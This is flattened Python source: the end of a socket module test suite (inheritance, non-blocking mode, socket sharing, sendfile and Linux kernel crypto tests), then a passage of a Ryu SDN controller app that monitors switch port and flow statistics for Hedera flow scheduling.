socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be a classmethod and not a staticmethod, or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking sockets
# since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain, socket.MSG_MORE)
op.sendall(b'\x00' * taglen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain + b'\x00' * taglen
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain + b'\x00' * taglen
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg))
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg))
self.assertEqual(plain, res[assoclen:-taglen])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
network_monitor.py
|
# Copyright (C) 2016 Li Cheng at Beijing University of Posts
# and Telecommunications. www.muzixing.com
# Copyright (C) 2016 Huang MaChi at Chongqing University
# of Posts and Telecommunications, China.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import copy
from operator import attrgetter
from threading import Thread
from ryu import cfg
from ryu.base import app_manager
from ryu.base.app_manager import lookup_service_brick
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import hub
import setting
from DemandEstimation import demand_estimation
CONF = cfg.CONF
class NetworkMonitor(app_manager.RyuApp):
"""
NetworkMonitor is a Ryu app for collecting traffic information.
"""
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(NetworkMonitor, self).__init__(*args, **kwargs)
self.name = 'monitor'
self.awareness = lookup_service_brick('awareness')
self.datapaths = {}
self.port_stats = {}
self.port_speed = {}
self.flow_stats = {}
self.flow_speed = {}
self.stats = {}
self.port_features = {}
self.free_bandwidth = {} # {dpid:{port_no:free_bw,},} Unit:Kbit/s
self.graph = None
self.capabilities = None
self.best_paths = None
# Create four data structures for Hedera specially.
self.hostsList = []
self.flows = [] # Record flows that need to be rescheduled. (hmc)
self.statRecord = []
self.pre_GFF_path = {} # Record the last GFF path of flows
# Start two green threads to monitor traffic and calculate
# the free bandwidth of links, respectively.
self.monitor_thread = hub.spawn(self._monitor)
self.save_freebandwidth_thread = hub.spawn(self._save_bw_graph)
def _monitor(self):
"""
Main entry method of monitoring traffic.
"""
while CONF.weight == 'bw' or CONF.weight == 'hop':
# Refresh data.
self.stats['flow'] = {}
self.stats['port'] = {}
self.capabilities = None
self.best_paths = None
self.statRecord = []
# self.flows = []
for dp in self.datapaths.values():
self.port_features.setdefault(dp.id, {})
self._request_stats(dp)
hub.sleep(setting.MONITOR_PERIOD)
if self.stats['flow'] or self.stats['port']:
self.show_stat('flow')
self.show_stat('port')
hub.sleep(1)
def _save_bw_graph(self):
"""
Save bandwidth data into networkx graph object.
"""
while CONF.weight == 'bw' or CONF.weight == 'hop':
self.graph = self.create_bw_graph(self.free_bandwidth)
self.logger.debug("save free bandwidth")
hub.sleep(setting.MONITOR_PERIOD)
@set_ev_cls(ofp_event.EventOFPStateChange,
[MAIN_DISPATCHER, DEAD_DISPATCHER])
def _state_change_handler(self, ev):
"""
Record datapath information.
"""
datapath = ev.datapath
if ev.state == MAIN_DISPATCHER:
if not datapath.id in self.datapaths:
self.logger.debug('register datapath: %016x', datapath.id)
self.datapaths[datapath.id] = datapath
elif ev.state == DEAD_DISPATCHER:
if datapath.id in self.datapaths:
self.logger.debug('unregister datapath: %016x', datapath.id)
del self.datapaths[datapath.id]
else:
pass
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def _port_stats_reply_handler(self, ev):
"""
Save each port's stats into self.port_stats.
Calculate the port speed and save it.
self.port_stats = {(dpid, port_no):[(tx_bytes, rx_bytes, rx_errors, duration_sec, duration_nsec),],}
self.port_speed = {(dpid, port_no):[speed,],}
Note: Since a port's transmit and receive performance are independent
of each other, we calculate the current load of a port using only
tx_bytes when finding a routing path.
"""
body = ev.msg.body
dpid = ev.msg.datapath.id
self.stats['port'][dpid] = body
self.free_bandwidth.setdefault(dpid, {})
for stat in sorted(body, key=attrgetter('port_no')):
port_no = stat.port_no
if port_no != ofproto_v1_3.OFPP_LOCAL:
key = (dpid, port_no)
value = (stat.tx_bytes, stat.rx_bytes, stat.rx_errors,
stat.duration_sec, stat.duration_nsec)
self._save_stats(self.port_stats, key, value, 5)
# Get port speed and save it.
pre = 0
period = setting.MONITOR_PERIOD
tmp = self.port_stats[key]
if len(tmp) > 1:
# Calculate only the tx_bytes, not the rx_bytes. (hmc)
pre = tmp[-2][0]
period = self._get_period(tmp[-1][3], tmp[-1][4], tmp[-2][3], tmp[-2][4])
speed = self._get_speed(self.port_stats[key][-1][0], pre, period)
self._save_stats(self.port_speed, key, speed, 5)
self._save_freebandwidth(dpid, port_no, speed)
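# Illustrative note (not part of the original module): after two replies, a
# self.port_stats entry might look like
#     self.port_stats[(1, 2)] = [(1000000, 500000, 0, 20, 0),
#                                (6000000, 800000, 0, 30, 0)]
# i.e. (tx_bytes, rx_bytes, rx_errors, duration_sec, duration_nsec) samples for
# port 2 of dpid 1. Only tx_bytes (index 0) feeds the speed calculation above.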
@set_ev_cls(ofp_event.EventOFPPortDescStatsReply, MAIN_DISPATCHER)
def port_desc_stats_reply_handler(self, ev):
"""
Save port description info.
"""
msg = ev.msg
dpid = msg.datapath.id
ofproto = msg.datapath.ofproto
config_dict = {ofproto.OFPPC_PORT_DOWN: "Down",
ofproto.OFPPC_NO_RECV: "No Recv",
ofproto.OFPPC_NO_FWD: "No Forward",
ofproto.OFPPC_NO_PACKET_IN: "No Packet-in"}
state_dict = {ofproto.OFPPS_LINK_DOWN: "Down",
ofproto.OFPPS_BLOCKED: "Blocked",
ofproto.OFPPS_LIVE: "Live"}
ports = []
for p in ev.msg.body:
ports.append('port_no=%d hw_addr=%s name=%s config=0x%08x '
'state=0x%08x curr=0x%08x advertised=0x%08x '
'supported=0x%08x peer=0x%08x curr_speed=%d '
'max_speed=%d' %
(p.port_no, p.hw_addr,
p.name, p.config,
p.state, p.curr, p.advertised,
p.supported, p.peer, p.curr_speed,
p.max_speed))
if p.config in config_dict:
config = config_dict[p.config]
else:
config = "up"
if p.state in state_dict:
state = state_dict[p.state]
else:
state = "up"
# Recording data.
port_feature = (config, state, p.curr_speed)
self.port_features[dpid][p.port_no] = port_feature
@set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
def _port_status_handler(self, ev):
"""
Handle the port status changed event.
"""
msg = ev.msg
ofproto = msg.datapath.ofproto
reason = msg.reason
dpid = msg.datapath.id
port_no = msg.desc.port_no
reason_dict = {ofproto.OFPPR_ADD: "added",
ofproto.OFPPR_DELETE: "deleted",
ofproto.OFPPR_MODIFY: "modified", }
if reason in reason_dict:
print "switch%d: port %s %s" % (dpid, reason_dict[reason], port_no)
else:
print "switch%d: Illeagal port state %s %s" % (dpid, port_no, reason)
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)
def _flow_stats_reply_handler(self, ev):
"""
Save flow stats reply information into self.flow_stats.
Calculate the flow speed and save it.
(old) self.flow_stats = {dpid:{(in_port, ipv4_dst, out-port):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
(old) self.flow_speed = {dpid:{(in_port, ipv4_dst, out-port):[speed,],},}
(new) self.flow_stats = {dpid:{(priority, ipv4_src, ipv4_dst):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
(new) self.flow_speed = {dpid:{(priority, ipv4_src, ipv4_dst):[speed,],},}
This is because the proactive flow entries don't have the 'in_port' and 'out-port' fields.
Note: table-miss, LLDP and ARP flow entries are not what we need, so just filter them out.
"""
body = ev.msg.body
dpid = ev.msg.datapath.id
self.statRecord.append(dpid)
self.stats['flow'][dpid] = body
self.flow_stats.setdefault(dpid, {})
self.flow_speed.setdefault(dpid, {})
for stat in sorted([flow for flow in body if ((flow.priority not in [0, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
key = (stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'))
value = (stat.packet_count, stat.byte_count,
stat.duration_sec, stat.duration_nsec)
self._save_stats(self.flow_stats[dpid], key, value, 5)
# Get the flow's speed and save it.
pre = 0
period = setting.MONITOR_PERIOD
tmp = self.flow_stats[dpid][key]
if len(tmp) > 1:
pre = tmp[-2][1]
period = self._get_period(tmp[-1][2], tmp[-1][3], tmp[-2][2], tmp[-2][3])
speed = self._get_speed(self.flow_stats[dpid][key][-1][1], pre, period)
self._save_stats(self.flow_speed[dpid], key, speed, 5)
# Record flows that need to be rescheduled. (hmc)
flowDemand = speed * 8.0 / (setting.MAX_CAPACITY * 1000)
src = stat.match['ipv4_src']
dst = stat.match['ipv4_dst']
if flowDemand > 0.1:
if src not in self.hostsList:
self.hostsList.append(src)
if dst not in self.hostsList:
self.hostsList.append(dst)
self.flows.append({'src': src, 'dst': dst, 'demand': flowDemand,
'converged': False, 'receiver_limited': False,
'match': stat.match, 'priority': stat.priority})
if not self.pre_GFF_path.has_key((src, dst)):
self.pre_GFF_path[(src, dst)] = None
else:
pass
# Estimate flows' demands if all the flow_stat replies are received.
if len(self.statRecord) == 1.25 * (CONF.fanout ** 2) and self.flows:
flows = sorted([flow for flow in self.flows], key=lambda flow: (flow['src'], flow['dst']))
self.flows = []
hostsList = sorted(self.hostsList)
self._demandEstimator(flows, hostsList)
else:
pass
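# Illustrative note (not part of the original module): with the new key scheme,
# a self.flow_stats entry might look like
#     self.flow_stats[3][(10, '10.1.0.1', '10.8.0.2')] = [(12, 18000, 20, 0),
#                                                         (30, 60000, 30, 0)]
# i.e. (packet_count, byte_count, duration_sec, duration_nsec) samples keyed by
# (priority, ipv4_src, ipv4_dst). The flow speed above is derived from
# byte_count (index 1), and flows whose normalized demand exceeds 0.1 are
# queued for Global First Fit rescheduling.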
def _demandEstimator(self, flows, hostsList):
'''
Estimate flows' demands.
'''
estimated_flows = demand_estimation(flows, hostsList)
for flow in estimated_flows:
if flow['demand'] > 0.1:
# Thread(target=self._GlobalFirstFit,args=(flow,)).start()
self._GlobalFirstFit(flow)
# self._GlobalFirstFit(flow)
def _GlobalFirstFit(self, flow):
'''
Do the Hedera Global First Fit here.
